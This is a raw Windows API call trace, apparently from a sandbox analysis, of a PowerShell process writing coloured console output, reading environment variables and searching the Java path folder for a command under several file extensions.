lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.395] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0276.395] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.396] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0276.396] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0276.397] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c03f304*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5c03f304*, lpNumberOfCharsWritten=0x653ef8b500*=0x48) returned 1 [0276.397] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.398] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0276.398] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.398] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0276.399] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0276.399] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0276.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0276.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.401] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.401] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.401] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0276.402] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.402] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0276.403] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0276.403] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c03f3b4*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5c03f3b4*, lpNumberOfCharsWritten=0x653ef8b500*=0x27) returned 1 [0276.404] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.404] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0276.405] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.405] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0276.405] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0276.406] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0276.406] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0276.407] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.407] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.408] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.408] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0276.408] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.409] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0276.409] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0276.410] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c03f41c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5c03f41c*, lpNumberOfCharsWritten=0x653ef8b500*=0x1) returned 1 [0276.410] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.410] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0276.411] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.411] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0276.412] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0276.412] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0276.622] EtwEventActivityIdControl () returned 0x0 [0276.622] EtwEventActivityIdControl () returned 0x0 [0276.622] EtwEventActivityIdControl () returned 0x0 [0276.685] CoCreateGuid (in: pguid=0x653ef8dfd8 | out: pguid=0x653ef8dfd8*(Data1=0xe344df0a, Data2=0x22ee, Data3=0x46c7, Data4=([0]=0x99, [1]=0xdf, [2]=0x24, [3]=0x7b, [4]=0x6d, [5]=0x7e, [6]=0xf9, [7]=0xd0))) returned 0x0 [0276.685] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef8da50, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0276.736] EtwEventActivityIdControl () returned 0x0 [0276.736] EtwEventActivityIdControl () returned 0x0 [0276.736] EtwEventActivityIdControl () returned 0x0 [0278.840] EtwEventActivityIdControl () returned 0x0 [0278.840] CoCreateGuid (in: pguid=0x653ef8dfd8 | out: pguid=0x653ef8dfd8*(Data1=0x19959017, Data2=0x26dd, Data3=0x4193, Data4=([0]=0x81, [1]=0xb2, [2]=0xe1, [3]=0x8e, [4]=0x1e, [5]=0x37, [6]=0xde, [7]=0x21))) returned 0x0 [0278.840] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef8da50, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0278.840] EtwEventActivityIdControl () returned 0x0 [0278.840] EtwEventActivityIdControl () returned 0x0 [0278.840] EtwEventActivityIdControl () returned 0x0 [0279.494] EtwEventActivityIdControl () returned 0x0 [0279.494] EtwEventActivityIdControl () returned 0x0 [0279.494] EtwEventActivityIdControl () returned 0x0 [0279.905] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef8e0b0, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0279.963] EtwEventActivityIdControl () returned 0x0 [0279.963] EtwEventActivityIdControl () returned 0x0 [0279.963] EtwEventActivityIdControl () returned 0x0 [0280.158] CoCreateGuid (in: pguid=0x653ef8e318 | out: pguid=0x653ef8e318*(Data1=0x11c49ee, Data2=0x6f8e, Data3=0x44de, Data4=([0]=0x9b, [1]=0xc6, [2]=0xaa, [3]=0x21, [4]=0xee, [5]=0x90, [6]=0xd2, [7]=0x62))) returned 0x0 [0280.160] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef8d7a0, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0280.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x653ef8d5a0, nSize=0xe4 | out: lpBuffer="") returned 0x3a [0280.164] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x653ef8d550, nSize=0xe4 | out: lpBuffer="") returned 0x3a [0280.164] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x653ef8d5c0, nSize=0xe4 | out: lpBuffer="") returned 0x9c [0280.167] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0280.167] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x25b73d007a0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x1f [0280.168] CoTaskMemFree (pv=0x25b73d007a0) [0280.169] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.169] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.170] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.172] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.172] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.ps1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.ps1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.174] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.174] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.175] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.175] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.psm1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.psm1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.175] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.175] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.176] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.176] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.176] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.176] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.psd1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.psd1"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.176] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.177] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.177] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.177] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.177] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.177] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.177] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.COM" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.com"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.178] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.178] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.178] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.178] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.178] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.EXE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.exe"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.179] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.179] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.179] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.179] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.180] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.180] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.BAT" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.bat"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.180] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.181] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d710) returned 1 [0280.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d7a0) returned 1 [0280.181] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d280, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.181] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\\x9f.CMD" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\\x9f.cmd"), lpFindFileData=0x653ef8d4b0 | out: lpFindFileData=0x653ef8d4b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d7a0) returned 1 [0280.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d740) returned 1 [0280.182] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d300, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d750) returned 1 [0280.182] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d830 | out: lpFileInformation=0x653ef8d830*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, 